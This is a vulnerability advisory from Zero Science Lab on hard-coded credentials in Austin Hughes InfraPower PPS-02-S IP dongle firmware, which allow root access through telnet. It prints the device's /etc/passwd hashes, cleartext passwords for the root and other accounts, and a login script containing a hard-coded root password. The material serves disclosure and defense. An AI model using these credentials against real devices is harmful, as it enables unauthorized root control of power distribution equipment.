InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access


Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)

Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.

Desc: InfraPower suffers from a use of hard-coded credentials. The IP
dongle firmware ships with hard-coded accounts that can be used to gain
full system access (root) using the telnet daemon on port 23.

Tested on: Linux 2.6.28 (armv5tel)
           lighttpd/1.4.30-devel-1321
           PHP/5.3.9
           SQLite/3.7.10


Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
                           @zeroscience


Advisory ID: ZSL-2016-5371
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php


27.09.2016

--


# cat /etc/passwd

root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh

# showing accounts in root group:

Username: root
Password: 8475
--
Username: service
Password: ipdongle
--
Username: www
Password: 9311
--
Username: www2
Password: 9311

# showing other less-privileged accounts: 

Username: user
Password: 8475
--
Username: admin
Password: 8475

--------

/mnt/mtd # echo $SHELL
/sbin/root_shell.sh
/mnt/mtd # cat /sbin/root_shell.sh 
#!/bin/sh
trap ""  2 3 9 24

# check login
passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`

if [ "$passWork" = "1" ]; then
  login_file=/mnt/mtd/root_login
  now_timestamp=`date +%s`

  if [ -f $login_file ]; then
    line=`wc -l $login_file | cut -c 1-9`
    if [ "$line" != "        0" ] && [ "$line" != "        1" ] && [ "$line" != "        2" ]; then
      pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
      pre_result1=`echo $pre_login | cut -d " " -f 1`
      pre_result2=`echo $pre_login | cut -d " " -f 2`
      pre_result3=`echo $pre_login | cut -d " " -f 3`
      if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
        pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
        result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
        if [ "$result" != "success" ]; then
          echo $result
          exit 0
        fi
      fi
    fi
  fi

  echo -n "password:"
  read pass
  if [ "$pass" != "999" ]; then
    echo "wrong password"
    echo fail $now_timestamp >> $login_file
    exit 0
  fi
  echo success $now_timestamp >> $login_file
fi

/bin/sh
/mnt/mtd # 

--------

/mnt/mtd # ls
IMG001.exe         boot.old.sh        load_config.log    main_conf          net_conf           passwd_conf        snmp_conf          web_conf
PDU3_ini           box_conf           log_memCheck.txt   main_conf.bak      net_conf.old       port_conf          snmpd.conf
PDU3_pol           info.zip           mac_addr           me_login           ntp_conf           private            start_service.log

--------

/mnt/mtd # df -h

Filesystem                Size      Used Available Use% Mounted on
tmpfs                   256.0M      4.0K    256.0M   0% /tmp
/dev/mtdblock1            1.4M     96.0K      1.3M   7% /mnt/mtd
/dev/mtdblock5            1.0M     60.0K    964.0K   6% /mnt/mtd1
/dev/mtdblock6            1.0M     60.0K    964.0K   6% /mnt/mtd2
/dev/mtdblock7            1.0M     60.0K    964.0K   6% /mnt/mtd3

--------

/www # ls -al

drwxr-xr-x    5 1013     1014            0 Jan 13 08:41 .
drwxr-xr-x   16 root     root            0 Nov 28 11:17 ..
-rwxr--r--    1 1013     1014         6875 Apr 22  2014 CSSSource.php
-rwxr--r--    1 1013     1014          291 Apr 22  2014 Config.php
-rwxr--r--    1 1013     1014         1685 Apr 22  2014 ConnPort.php
-rwxr--r--    1 1013     1014         5787 Apr 22  2014 FWUpgrade.php
-rwxr--r--    1 1013     1014         7105 Apr 22  2014 Firmware.php
-rwxr--r--    1 1013     1014        10429 Apr 22  2014 Function.php
drwxr-xr-x    2 1013     1014            0 Apr 22  2014 General
-rwxr--r--    1 1013     1014         1407 Apr 22  2014 Header.php
-rwxr--r--    1 1013     1014         6775 Apr 22  2014 IPSettings.php
drwxr-xr-x    2 1013     1014            0 Apr 22  2014 Images
drwxr-xr-x    2 1013     1014            0 Apr 22  2014 JavaScript
-rwxr--r--    1 1013     1014          408 Apr 22  2014 JavaSource.php
-rwxr--r--    1 1013     1014          849 Apr 22  2014 ListFile.php
-rwxr--r--    1 1013     1014        12900 Apr 22  2014 Login.php
-rwxr--r--    1 1013     1014          355 Apr 22  2014 Logout.php
-rwxr--r--    1 1013     1014          352 Apr 22  2014 Main_Config.php
-rwxr--r--    1 1013     1014         5419 Apr 22  2014 Menu.php
-rwxr--r--    1 1013     1014          942 Apr 22  2014 Menu_3.php
-rwxr--r--    1 1013     1014         4491 Apr 22  2014 Ntp.php
-rwxr--r--    1 1013     1014        23853 Apr 22  2014 OutletDetails.php
-rwxr--r--    1 1013     1014         1905 Apr 22  2014 OutletDetails_Ajax.php
-rwxr--r--    1 1013     1014        48411 Apr 22  2014 PDUDetails.php
-rwxr--r--    1 1013     1014         4081 Apr 22  2014 PDUDetails_Ajax_Details.php
-rwxr--r--    1 1013     1014         1397 Apr 22  2014 PDUDetails_Ajax_Outlet.php
-rwxr--r--    1 1013     1014        19165 Apr 22  2014 PDULog.php
-rwxr--r--    1 1013     1014        29883 Apr 22  2014 PDUStatus.php
-rwxr--r--    1 1013     1014         4418 Apr 22  2014 PDUStatus_Ajax.php
-rwxr--r--    1 1013     1014         7791 Apr 22  2014 PortSettings.php
-rwxr--r--    1 1013     1014        24696 Apr 22  2014 SNMP.php
-rwxr--r--    1 1013     1014        38253 Apr 22  2014 SensorDetails.php
-rwxr--r--    1 1013     1014        27210 Apr 22  2014 SensorStatus.php
-rwxr--r--    1 1013     1014         5984 Apr 22  2014 SensorStatus_Ajax.php
-rwxr--r--    1 1013     1014        40944 Apr 22  2014 System.php
-rwxr--r--    1 1013     1014         4373 Apr 22  2014 UploadEXE.php
-rwxr--r--    1 1013     1014         9460 Apr 22  2014 User.php
-rwxr--r--    1 1013     1014        23170 Apr 22  2014 WriteRequest.php
-rwxr--r--    1 1013     1014         8850 Apr 22  2014 WriteRequest_Ajax.php
-rwxr--r--    1 1013     1014        10811 Apr 22  2014 dball.php
-rwxr--r--    1 1013     1014          771 Apr 22  2014 doupgrate.php
-rwxr--r--    1 1013     1014           76 Apr 22  2014 index.php
-rwxr--r--    1 1013     1014           49 Apr 22  2014 nfs.sh
-rwxr--r--    1 1013     1014         5410 Apr 22  2014 production_test1.php
-rwxr--r--    1 1013     1014          723 Apr 22  2014 vaildate.php
-rwxr--r--    1 1013     1014          611 Apr 22  2014 wiseup.php